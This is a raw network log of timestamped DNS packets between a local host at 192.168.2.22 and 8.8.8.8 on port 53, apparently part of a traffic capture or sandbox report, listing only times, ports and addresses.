Apr 24, 2024 10:25:58.989108086 CEST	53	54998	8.8.8.8	192.168.2.22
Apr 24, 2024 10:25:59.998281956 CEST	52781	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:00.168962955 CEST	53	52781	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:00.169178963 CEST	52781	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:00.340002060 CEST	53	52781	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:00.340241909 CEST	52781	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:00.513348103 CEST	53	52781	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:00.513514996 CEST	52781	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:00.683156967 CEST	53	52781	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:00.683408022 CEST	52781	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:00.855165958 CEST	53	52781	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:02.015851974 CEST	63926	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:02.187155008 CEST	53	63926	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:02.187361956 CEST	63926	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:02.358052015 CEST	53	63926	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:02.358251095 CEST	63926	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:02.528703928 CEST	53	63926	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:02.529007912 CEST	63926	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:02.702465057 CEST	53	63926	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:02.702657938 CEST	63926	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:02.874758005 CEST	53	63926	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:03.882461071 CEST	65510	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:04.053447962 CEST	53	65510	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:04.053642988 CEST	65510	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:04.223450899 CEST	53	65510	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:04.223642111 CEST	65510	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:04.395903111 CEST	53	65510	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:04.397315979 CEST	65510	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:04.566926003 CEST	53	65510	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:04.570049047 CEST	65510	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:04.739326000 CEST	53	65510	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:05.754127026 CEST	62672	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:05.925120115 CEST	53	62672	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:05.925287962 CEST	62672	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:06.095607042 CEST	53	62672	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:06.096163034 CEST	62672	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:06.265571117 CEST	53	62672	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:06.268366098 CEST	62672	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:06.438157082 CEST	53	62672	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:06.440059900 CEST	62672	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:06.610205889 CEST	53	62672	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:07.635370970 CEST	56475	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:07.880388021 CEST	53	56475	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:07.884155989 CEST	56475	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:08.056811094 CEST	53	56475	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:08.056999922 CEST	56475	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:08.227189064 CEST	53	56475	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:08.227368116 CEST	56475	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:08.396945953 CEST	53	56475	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:08.397118092 CEST	56475	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:08.569644928 CEST	53	56475	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:09.588845015 CEST	49384	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:09.760201931 CEST	53	49384	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:09.760467052 CEST	49384	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:09.931088924 CEST	53	49384	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:09.934259892 CEST	49384	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:10.112226009 CEST	53	49384	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:10.112695932 CEST	49384	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:10.287075996 CEST	53	49384	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:10.287306070 CEST	49384	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:10.471915007 CEST	53	49384	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:11.515882969 CEST	54842	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:11.686131954 CEST	53	54842	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:11.686635971 CEST	54842	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:11.859334946 CEST	53	54842	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:11.860064030 CEST	54842	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:12.030911922 CEST	53	54842	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:12.034003973 CEST	54842	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:12.203296900 CEST	53	54842	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:12.204121113 CEST	54842	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:12.374563932 CEST	53	54842	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:13.393147945 CEST	58105	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:13.563388109 CEST	53	58105	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:13.563674927 CEST	58105	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:13.733494043 CEST	53	58105	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:13.733809948 CEST	58105	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:13.905585051 CEST	53	58105	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:13.905854940 CEST	58105	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:14.076750994 CEST	53	58105	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:14.076961994 CEST	58105	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:14.247693062 CEST	53	58105	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:15.263612032 CEST	64928	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:15.437956095 CEST	53	64928	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:15.438158989 CEST	64928	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:15.611864090 CEST	53	64928	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:15.612039089 CEST	64928	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:15.781730890 CEST	53	64928	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:15.781912088 CEST	64928	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:15.953032970 CEST	53	64928	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:15.956006050 CEST	64928	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:16.126195908 CEST	53	64928	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:17.141819000 CEST	57390	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:17.312261105 CEST	53	57390	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:17.312514067 CEST	57390	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:17.483273029 CEST	53	57390	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:17.483541012 CEST	57390	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:17.655482054 CEST	53	57390	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:17.655766010 CEST	57390	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:17.827130079 CEST	53	57390	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:17.827779055 CEST	57390	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:17.998078108 CEST	53	57390	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:19.017961979 CEST	58095	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:19.262922049 CEST	53	58095	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:19.263251066 CEST	58095	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:19.433044910 CEST	53	58095	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:19.433320999 CEST	58095	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:19.603964090 CEST	53	58095	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:19.604360104 CEST	58095	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:19.777791023 CEST	53	58095	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:19.778085947 CEST	58095	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:19.947706938 CEST	53	58095	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:20.967439890 CEST	54261	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:21.137733936 CEST	53	54261	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:21.137948036 CEST	54261	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:21.307137966 CEST	53	54261	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:21.307370901 CEST	54261	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:21.478547096 CEST	53	54261	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:21.478739023 CEST	54261	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:21.649339914 CEST	53	54261	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:21.649736881 CEST	54261	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:21.820276022 CEST	53	54261	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:22.837414026 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:23.007540941 CEST	53	60507	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:23.008045912 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:23.177845955 CEST	53	60507	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:23.178286076 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:23.349260092 CEST	53	60507	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:23.350197077 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:23.522248983 CEST	53	60507	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:23.526859999 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:23.696813107 CEST	53	60507	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:24.729510069 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:24.899585009 CEST	53	50446	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:24.902626038 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:25.071985960 CEST	53	50446	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:25.074109077 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:25.243480921 CEST	53	50446	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:25.248095989 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:25.417495012 CEST	53	50446	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:25.420064926 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:25.589740038 CEST	53	50446	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:26.615236998 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:26.789223909 CEST	53	55939	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:26.789685011 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:26.960005999 CEST	53	55939	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:26.960366011 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:27.131520987 CEST	53	55939	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:27.134469986 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:27.308566093 CEST	53	55939	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:27.310321093 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:27.481079102 CEST	53	55939	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:28.498672962 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:28.669480085 CEST	53	49608	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:28.669715881 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:28.839267969 CEST	53	49608	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:28.843343973 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:29.013062954 CEST	53	49608	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:29.014024019 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:29.184525013 CEST	53	49608	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:29.188075066 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:29.359255075 CEST	53	49608	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:30.378530025 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:30.548897028 CEST	53	61486	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:30.549201012 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:30.719038963 CEST	53	61486	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:30.719280005 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:30.890930891 CEST	53	61486	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:30.892087936 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:31.062223911 CEST	53	61486	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:31.066544056 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:31.236418009 CEST	53	61486	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:32.264113903 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:32.434309006 CEST	53	62453	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:32.435990095 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:32.608386040 CEST	53	62453	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:32.612020969 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:32.782147884 CEST	53	62453	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:32.784038067 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:32.954185963 CEST	53	62453	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:32.954375029 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:33.125056982 CEST	53	62453	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:34.147094011 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:34.319205046 CEST	53	50568	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:34.322164059 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:34.494045019 CEST	53	50568	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:34.494247913 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:34.666218996 CEST	53	50568	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:34.666445017 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:34.836074114 CEST	53	50568	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:34.836266994 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:35.006588936 CEST	53	50568	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:36.022141933 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:36.191618919 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:36.192116976 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:36.361696005 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:36.385910988 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:36.555663109 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:36.555946112 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:36.725583076 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:36.725908995 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:36.896856070 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:37.908126116 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:38.077953100 CEST	53	61618	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:38.082025051 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:38.253299952 CEST	53	61618	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:38.254729986 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:38.435071945 CEST	53	61618	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:38.436250925 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:38.679985046 CEST	53	61618	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:38.692132950 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:38.861875057 CEST	53	61618	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:39.883049011 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:40.052531004 CEST	53	54422	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:40.063769102 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:40.233623981 CEST	53	54422	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:40.234283924 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:40.404189110 CEST	53	54422	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:40.409471035 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:40.579121113 CEST	53	54422	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:40.579416037 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:40.750876904 CEST	53	54422	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:41.760252953 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:41.930162907 CEST	53	52074	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:41.930387974 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:42.102247953 CEST	53	52074	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:42.102483988 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:42.274316072 CEST	53	52074	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:42.274511099 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:42.444140911 CEST	53	52074	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:42.444380045 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:42.613888025 CEST	53	52074	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:43.633527994 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:43.803381920 CEST	53	50337	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:43.803612947 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:43.974030018 CEST	53	50337	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:43.974252939 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:44.144519091 CEST	53	50337	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:44.144788027 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:44.314449072 CEST	53	50337	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:44.314753056 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:44.484065056 CEST	53	50337	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:45.511540890 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:45.680934906 CEST	53	61826	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:45.681195974 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:45.851068974 CEST	53	61826	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:45.851459980 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:46.021663904 CEST	53	61826	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:46.024245977 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:46.193643093 CEST	53	61826	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:46.196147919 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:46.366025925 CEST	53	61826	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:47.376566887 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:47.545990944 CEST	53	56329	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:47.546252012 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:47.717617989 CEST	53	56329	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:47.717948914 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:47.887841940 CEST	53	56329	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:47.890384912 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:48.060672045 CEST	53	56329	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:48.062460899 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:48.232204914 CEST	53	56329	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:49.293787003 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:49.464854956 CEST	53	63469	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:49.468005896 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:49.641421080 CEST	53	63469	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:49.642745972 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:49.815567970 CEST	53	63469	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:49.816121101 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:49.989448071 CEST	53	63469	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:49.989768982 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:50.159270048 CEST	53	63469	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:51.184731007 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:51.356147051 CEST	53	59447	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:51.356460094 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:51.528085947 CEST	53	59447	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:51.528373003 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:51.704950094 CEST	53	59447	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:51.705147028 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:51.875212908 CEST	53	59447	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:51.875488997 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:52.048131943 CEST	53	59447	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:53.071609974 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:53.241024971 CEST	53	51828	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:53.244083881 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:53.415363073 CEST	53	51828	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:53.416080952 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:53.585895061 CEST	53	51828	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:53.586147070 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:53.755740881 CEST	53	51828	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:53.756022930 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:53.925987005 CEST	53	51828	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:54.942730904 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:55.113584995 CEST	53	53406	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:55.113914013 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:55.291619062 CEST	53	53406	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:55.291960001 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:55.462474108 CEST	53	53406	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:55.462747097 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:55.632875919 CEST	53	53406	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:55.633198977 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:55.805849075 CEST	53	53406	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:56.815146923 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:56.984988928 CEST	53	56345	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:56.985198975 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:57.154695034 CEST	53	56345	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:57.154947996 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:57.331542015 CEST	53	56345	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:57.331898928 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:57.501537085 CEST	53	56345	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:57.889547110 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:58.059910059 CEST	53	56345	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:59.076612949 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:59.247308969 CEST	53	51870	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:59.247564077 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:59.423841953 CEST	53	51870	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:59.424071074 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:59.674071074 CEST	53	51870	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:59.674339056 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:26:59.844248056 CEST	53	51870	8.8.8.8	192.168.2.22
Apr 24, 2024 10:26:59.844574928 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:00.015650988 CEST	53	51870	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:01.053934097 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:01.224641085 CEST	53	65009	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:01.226421118 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:01.397818089 CEST	53	65009	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:01.402256012 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:01.572758913 CEST	53	65009	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:01.574209929 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:01.743514061 CEST	53	65009	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:01.748420954 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:01.920176029 CEST	53	65009	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:03.415186882 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:03.586216927 CEST	53	64956	8.8.8.8	192.168.2.22
